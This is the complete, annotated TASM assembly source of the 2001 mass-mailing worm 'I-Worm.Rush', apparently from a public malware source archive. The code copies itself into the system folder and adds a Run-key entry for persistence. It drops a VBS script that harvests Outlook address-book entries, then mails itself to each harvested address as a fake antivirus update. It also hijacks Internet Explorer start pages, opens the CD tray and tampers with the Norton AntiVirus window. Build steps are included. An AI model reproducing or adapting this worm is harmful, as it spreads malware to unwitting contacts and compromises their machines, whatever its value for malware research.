mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
vxug-MalwareSourceCode/Win32/I-Worm.Rush.asm
2020-10-09 22:16:57 -05:00


comment #
Name : I-Worm.Rush
Author : PetiK
Date : August 27th - September 2nd
Size : 5632 byte (compiled with UPX tool)
Action : Copy itself to
* WINDOWS\SYSTEM\Mail32.exe
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Mail Outlook = WINDOWS\SYSTEM\Mail32.exe
* On Wednesday it opens the cdrom
* On the 3rd it produces a sound
* On the 15th it alters "Search Page", "Start Page", and "Local Page"
* Creates %personal%\Read_Me.txt with a text
* A VBS file searches all email addresses in the Outlook software and puts them in MailBook.txt.
The worm then scans that file to find email addresses.
Subject : New Scan Virus...
Body : Hi man,
I send you the last update of ScanVir (v 2.5).
Look at the file attached.
Bye and have a nice day.
Attached : ScanVir_25.exe
* Scans title of windows :
- Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm
- System Properties => Minimize the window
To build the worm:
@echo off
tasm32 /ml /m9 Rush
tlink32 -Tpe -c -x -aa Rush,,,import32,dllz
upx -9 Rush.exe
if exist *.obj del *.obj
if exist *.map del *.map
To delete the worm:
del %windir%\system\Mail32.exe
del %personal%\Read_Me.txt
del %windir%\MailBook.txt
#
.586p                                   ; TASM: Pentium instruction set, privileged forms allowed
.model flat                             ; 32-bit flat memory model (Win32 PE)
.code
JUMPS                                   ; TASM: auto-widen conditional jumps that are out of short range
; callx <api> -- declare an imported Win32 routine as an external proc and call it.
; Every API in this file is reached through this macro, so the extrn list is the
; binary's observable import surface (CopyFileA, SHSetValueA, MAPISendMail, ...).
callx macro a
extrn a:proc
call a
endm
include useful.inc                      ; not on this page; @pushsz / @endsz presumably come from here -- verify
include myinclude.inc                   ; not on this page; the SystemTime layout presumably comes from here -- verify
;-----------------------------------------------------------------------
; start -- entry point. Flat control flow: copy self into the system
; directory, add a Run-key value, run the date-triggered payloads, harvest
; addresses, mail itself, then poll window titles until ExitProcess.
; Persistence artifacts produced by this block:
;   file : <system dir>\Mail32.exe (copy_worm)
;   reg  : HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value "Mail Outlook"
;-----------------------------------------------------------------------
start:
;call hide_worm                         ; hide_worm (RegisterServiceProcess) is assembled in but never called
twin_worm:
push 50                                 ; GetModuleFileNameA(NULL, orig_worm, 50): path of the running image
mov esi,offset orig_worm                ; esi = orig_worm, reused as the CopyFileA source below
push esi
push 0
callx GetModuleFileNameA
mov edi,offset copy_worm                ; GetSystemDirectoryA(copy_worm, 50)
push edi                                ; saved buffer start, popped once the file name is appended
push 50
push edi
callx GetSystemDirectoryA
add edi,eax                             ; eax = length written; edi -> terminating NUL
mov eax,"iaM\"                          ; three little-endian dword stores append "\Mai" "l32." "exe"
stosd
mov eax,".23l"
stosd
mov eax,"exe"                           ; 3-char constant: top byte is zero, which becomes the NUL terminator
stosd
pop edi                                 ; edi = copy_worm again
push 0                                  ; CopyFileA(orig_worm, copy_worm, bFailIfExists=FALSE): overwrites
push edi
push esi
callx CopyFileA
push 8                                  ; SHSetValueA(HKLM, "...\Run", "Mail Outlook", REG_SZ(1), copy_worm, cb=8)
push edi                                ; cb=8: only the first 8 bytes of copy_worm are stored in the value
push 1
@pushsz "Mail Outlook"                  ; @pushsz presumably pushes the address of an inline string (include macro) -- verify
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h                          ; HKEY_LOCAL_MACHINE
callx SHSetValueA
check_date:                             ; payload 1: on Wednesday (wDayOfWeek == 3) open the CD tray
push offset SystemTime                  ; GetSystemTime(&SystemTime)
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],03h         ; 0 = Sunday, so 3 = Wednesday
jne beep1
cdrom_open:
push 00h                                ; mciSendStringA("open cdaudio", NULL, 0, NULL)
push 00h
push 00h
@pushsz "open cdaudio"
callx mciSendStringA
push 00h                                ; mciSendStringA("set cdaudio door open", NULL, 0, NULL)
push 00h
push 00h
@pushsz "set cdaudio door open"
callx mciSendStringA
beep1: push offset SystemTime           ; payload 2: on the 3rd of the month, 5000 x MessageBeep
callx GetSystemTime
cmp [SystemTime.wDay],03h
jne special_folder
mov counter,0                           ; counter is a .data dword, not a register
beep2: inc counter
push 30h                                ; MessageBeep(MB_ICONEXCLAMATION)
callx MessageBeep
push 1                                  ; Sleep(1) between beeps
callx Sleep
cmp counter,5000
jne beep2
special_folder:                         ; payload 3: drop <personal>\Read_Me.txt (contents in txtd)
push 00h                                ; SHGetSpecialFolderPathA(NULL, personal, CSIDL_PERSONAL(5), fCreate=0)
push 05h
push offset personal
push 00h
callx SHGetSpecialFolderPathA
@pushsz "\Read_Me.txt"                  ; lstrcat(personal, "\Read_Me.txt"); personal is a 70-byte buffer
push offset personal
callx lstrcat
txt_file:
push 00h                                ; CreateFileA(personal, GENERIC_WRITE, FILE_SHARE_READ, NULL,
push 01h                                ;             CREATE_ALWAYS, dwFlagsAndAttributes=1, NULL)
push 02h                                ; CREATE_ALWAYS
push 00h
push 01h                                ; FILE_SHARE_READ
push 40000000h                          ; GENERIC_WRITE
push offset personal
callx CreateFileA
mov [FileHdl],eax                       ; handle stored without an INVALID_HANDLE_VALUE check
push 00h                                ; WriteFile(FileHdl, txtd, TXTSIZE, &octets, NULL)
push offset octets
push TXTSIZE
push offset txtd
push [FileHdl]
callx WriteFile
push [FileHdl]                          ; CloseHandle(FileHdl)
callx CloseHandle
vbs_file:                               ; drop and run C:\rushhour.vbs (contents in vbsd), delete it ~2 s later
pushad                                  ; preserve all registers while edi holds the file handle
push 00h                                ; CreateFileA("C:\rushhour.vbs", GENERIC_WRITE, FILE_SHARE_READ, NULL,
push 80h                                ;             CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\rushhour.vbs"
callx CreateFileA
xchg edi,eax                            ; edi = file handle
push 00h                                ; WriteFile(edi, vbsd, VBSSIZE, &octets, NULL)
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1                                  ; WinExec("wscript C:\rushhour.vbs", SW_SHOWNORMAL)
@pushsz "wscript C:\rushhour.vbs"       ; the script writes Outlook address entries to <windows dir>\MailBook.txt
callx WinExec
push 2000                               ; Sleep(2000): fixed delay, the wscript process is not waited on
callx Sleep
@pushsz "C:\rushhour.vbs"               ; DeleteFileA("C:\rushhour.vbs"): the script exists on disk only briefly
callx DeleteFileA
push offset SystemTime                  ; payload 4: on the 15th rewrite the IE Search/Start/Local Page values
callx GetSystemTime
cmp [SystemTime.wDay],0Fh
jne start_scan
call internet_page
start_scan:                             ; build the path <windows dir>\MailBook.txt in mailbook
mov edi,offset mailbook                 ; GetWindowsDirectoryA(mailbook, 50)
push edi                                ; saved buffer start
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax                             ; edi -> terminating NUL
mov eax,"iaM\"                          ; "\Mai"
stosd
mov eax,"ooBl"                          ; "lBoo"
stosd
mov eax,"xt.k"                          ; "k.tx"
stosd
mov ax,"t"                              ; 16-bit write: stores 't',0 followed by two stale bytes of the previous constant;
stosd                                   ; the string ends at that NUL, so the path reads "...\MailBook.txt"
xor eax,eax                             ; four more zero bytes
stosd
open_scan_file:
pushad                                  ; ebx/ebp/esi become handle/mapping/cursor below; popad at not_exist restores
push 00h                                ; CreateFileA(mailbook, GENERIC_READ, FILE_SHARE_READ, NULL,
push 80h                                ;             OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)
push 03h                                ; OPEN_EXISTING
push 00h
push 01h
push 80000000h                          ; GENERIC_READ
push offset mailbook
callx CreateFileA
inc eax                                 ; INVALID_HANDLE_VALUE (-1) + 1 == 0: file absent, skip the scan
je not_exist
dec eax
xchg eax,ebx                            ; ebx = file handle
xor eax,eax                             ; CreateFileMappingA(ebx, NULL, PAGE_READONLY(2), 0, 0, NULL)
push eax
push eax
push eax
push 2
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp                            ; ebp = mapping handle
xor eax,eax                             ; MapViewOfFile(ebp, FILE_MAP_READ(4), 0, 0, 0)
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi                            ; esi = read cursor into the mapped file
push 0                                  ; GetFileSize(ebx, NULL)
push ebx
callx GetFileSize
cmp eax,3
jbe F3                                  ; files of 3 bytes or less are not scanned; the size is not used as a bound
scan_file:                              ; one line per iteration; each line containing '@' is passed to send_mail
xor edx,edx                             ; edx = number of '@' bytes seen on the current line
mov edi,offset mail_addr                ; edi = write cursor into mail_addr (128 bytes, no length check)
push edi                                ; balanced by the pop at entr1/entr2; still on the stack when f_mail is reached
p_c: lodsb                              ; read one byte; the loop ends only on '#', not on the file size
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"                              ; '#' is the terminator line the VBS appends to MailBook.txt
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb                            ; copy the byte into mail_addr
jmp p_c
car_s: inc esi                          ; a space drops itself and the byte after it
jmp p_c
entr1: xor al,al                        ; CR: NUL-terminate mail_addr
stosb
pop edi
test edx,edx                            ; only lines containing '@' are treated as an address
je scan_file
call send_mail                          ; MAPISendMail with mail_addr as recipient (Message structure in .data)
jmp scan_file
entr2: xor al,al                        ; LF: NUL-terminate and start the next line
stosb
pop edi
jmp scan_file
f_mail:                                 ; '#' reached: fall through into the cleanup chain (the scan_file push edi is left on the stack)
F3: push esi                            ; UnmapViewOfFile(view)
callx UnmapViewOfFile
F2: push ebp                            ; CloseHandle(mapping)
callx CloseHandle
F1: push ebx                            ; CloseHandle(file)
callx CloseHandle
not_exist:
popad                                   ; after f_mail the extra dword above shifts the restored values by one slot
scan_window:mov counter,0               ; final stage: poll window titles up to 1,000,000 times, then exit
win1: inc counter
cmp counter,1000000
je end_w
@pushsz "Norton AntiVirus"              ; FindWindowA(NULL, "Norton AntiVirus")
push 00h
callx FindWindowA
test eax,eax
jz win2
jmp change_nav
win2: @pushsz "System Properties"       ; FindWindowA(NULL, "System Properties")
push 00h
callx FindWindowA
test eax,eax
jz win3
jmp show_window
win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer"
push 00h                                ; FindWindowA(NULL, "Microsoft Home Page - Microsoft Internet Explorer")
callx FindWindowA
test eax,eax
jz win1                                 ; nothing found: loop again with no sleep (busy polling)
jmp display_message
change_nav:                             ; retitle the Norton AntiVirus window
mov edi,eax                             ; edi = hwnd
@pushsz "Norton Virus : W32.Norton.Worm@mm"
push edi
callx SetWindowTextA                    ; SetWindowTextA(hwnd, "Norton Virus : W32.Norton.Worm@mm")
jmp win1
show_window:                            ; minimize the System Properties window
mov edi,eax
push 2                                  ; SW_SHOWMINIMIZED
push edi
callx ShowWindow
jmp win1
display_message:                        ; fake "no access" box, then hide the IE window
mov edi,eax
push 10h                                ; MB_ICONHAND
@pushsz "Microsoft Internet Explorer"   ; caption
@pushsz "You don't have access to this page"
push 00h                                ; MessageBoxA(NULL, text, caption, MB_ICONHAND)
callx MessageBoxA
push 0                                  ; ShowWindow(hwnd, SW_HIDE)
push edi
callx ShowWindow
jmp win1
end_w: push 00h                         ; ExitProcess(0)
callx ExitProcess
;-----------------------------------------------------------------------
; hide_worm -- Win9x task-list hiding through Kernel32!RegisterServiceProcess(0, 1),
; resolved at run time with GetProcAddress. Dead code in this listing: its only
; call site (at start) is commented out. Preserves all registers (pushad/popad).
;-----------------------------------------------------------------------
hide_worm:
pushad
@pushsz "Kernel32.dll"                  ; GetModuleHandleA("Kernel32.dll")
callx GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm                     ; module handle 0: give up
@pushsz "RegisterServiceProcess"        ; GetProcAddress(hKernel32, "RegisterServiceProcess")
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz end_hide_worm                     ; export missing (it is absent on NT-family kernel32): give up
push 1                                  ; RegisterServiceProcess(0 = current process, 1 = register)
push 0
call ecx
end_hide_worm:
popad
ret
;-----------------------------------------------------------------------
; internet_page -- set the HKCU\Software\Microsoft\Internet Explorer\Main
; values "Search Page", "Start Page" and "Local Page" to http://www.petik.fr.fm.
; Reached only on the 15th (wDay check before start_scan).
; Preserves all registers (pushad/popad).
;-----------------------------------------------------------------------
internet_page:
pushad
call diff_val                           ; call/pop idiom: esi = address of the inline value-name table below
db "Search Page",0
db "Start Page",0
db "Local Page",0
diff_val:
pop esi                                 ; esi -> "Search Page"
push 3
pop ecx                                 ; ecx = 3 value names
page_loop:
push ecx                                ; ecx is not preserved across the API call
push 32                                 ; SHSetValueA(HKCU, "Software\Microsoft\Internet Explorer\Main", esi,
@pushsz "http://www.petik.fr.fm"        ;            REG_SZ(1), "http://www.petik.fr.fm", cb=32)
push 1
push esi
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h                          ; HKEY_CURRENT_USER
callx SHSetValueA
@endsz                                  ; include macro; presumably advances esi past the NUL to the next name -- verify
pop ecx
loop page_loop
popad
ret
;-----------------------------------------------------------------------
; send_mail -- MAPISendMail(MAPIHdl, 0, &Message, 0, 0). Called from scan_file
; for every MailBook.txt line containing '@'; recipient, subject, body and the
; attachment (the running image, named ScanVir_25.exe) come from the Message
; structure in .data. MAPIHdl is 0 in .data and nothing on this page writes it.
; Clobbers eax (plus whatever the API call clobbers); ebx/ebp/esi/edi, the
; scan_file state, are not touched here.
;-----------------------------------------------------------------------
send_mail:
xor eax,eax
push eax                                ; ulReserved
push eax                                ; flFlags
push offset Message                     ; lpMessage
push eax                                ; ulUIParam
push [MAPIHdl]                          ; lhSession
callx MAPISendMail
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)                 ; path of the running image (GetModuleFileNameA); also the attachment path
copy_worm db 50 dup (0)                 ; <system dir>\Mail32.exe
; === beep ===
counter dd ?                            ; loop counter shared by beep2 and win1
; === special_folder ===
personal db 70 dup (0)                  ; <CSIDL_PERSONAL>\Read_Me.txt
octets dd ?                             ; bytes-written out-parameter for WriteFile
FileHdl dd ?                            ; handle of Read_Me.txt
; === scan email ===
mailbook db 50 dup (0)                  ; <windows dir>\MailBook.txt (written by the VBS, read by scan_file)
mail_addr db 128 dup (?)                ; current address line; MsgTo's name and address fields point here
MAPIHdl dd 0                            ; MAPI session handle passed to MAPISendMail; never written on this page
name_mail db "ScanVir_25.exe",0         ; attachment display name
subject db "New Scan Virus...",0        ; mail subject
body db "Hi man,",0dh,0ah               ; mail body (CRLF line ends)
db "I send you the last update of ScanVir (v 2.5).",0dh,0ah
db "Look at the file attached.",0dh,0ah,0dh,0ah
db 09h,09h,09h,09h,"Bye and have a nice day.",0
namefrom db "Your Best Friend",0        ; originator display name
; MapiMessage, field order as in MAPI.H
Message dd ?                            ; ulReserved
dd offset subject                       ; lpszSubject
dd offset body                          ; lpszNoteText
dd ?                                    ; lpszMessageType
dd ?                                    ; lpszDateReceived
dd ?                                    ; lpszConversationID
dd 2                                    ; flFlags
dd offset MsgFrom                       ; lpOriginator
dd 1                                    ; nRecipCount
dd offset MsgTo                         ; lpRecips
dd 1                                    ; nFileCount
dd offset Attach                        ; lpFiles
; MapiRecipDesc for the originator: 5 dwords declared here (ulReserved, ulRecipClass,
; lpszName, lpszAddress, ulEIDSize); the 6th field would overlap MsgTo.ulReserved
MsgFrom dd ?                            ; ulReserved
dd namefrom                             ; written without 'offset' and in the ulRecipClass slot -- verify what TASM emits here
dd ?
dd ?
dd ?
; MapiRecipDesc for the recipient
MsgTo dd ?                              ; ulReserved
dd 1                                    ; ulRecipClass = MAPI_TO
dd offset mail_addr                     ; lpszName
dd offset mail_addr                     ; lpszAddress
dd ?                                    ; ulEIDSize
dd ?                                    ; lpEntryID
; MapiFileDesc for the attachment
Attach dd ?                             ; ulReserved
dd ?                                    ; flFlags
dd ?                                    ; nPosition
dd offset orig_worm                     ; lpszPathName: the running image itself
dd offset name_mail                     ; lpszFileName: "ScanVir_25.exe"
dd ?                                    ; lpFileType
; Read_Me.txt contents (TXTSIZE bytes)
txtd: db "Hi man,",0dh,0ah,0dh,0ah
db "I don't want to destroy your computer.",0dh,0ah
db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"PetiK",00h
TXTSIZE equ $-txtd
; rushhour.vbs contents (VBSSIZE bytes): walk every Outlook address list through
; MAPI and append each entry's address to <windows dir>\MailBook.txt, one per
; line, then a final "#" line that scan_file uses as its end marker
vbsd: db 'On Error Resume Next',0dh,0ah
db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah   ; GetSpecialFolder(0) = Windows folder
db 'txt.Close',0dh,0ah
db 'For Each M In chan.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
db 'Set P=M.AddressEntries(O)',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah   ; 8 = ForAppending
db 'txt.WriteLine P.Address',0dh,0ah
db 'txt.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine "#"',0dh,0ah          ; end-of-list marker consumed by scan_file
db 'txt.Close',0dh,0ah
VBSSIZE equ $-vbsd
; plain-text strings present in the binary, usable for identification
signature db "I-Worm.Rush",00h
origine db "A worm made in France",00h
author db "Written by PetiK - 2001",00h
end start
end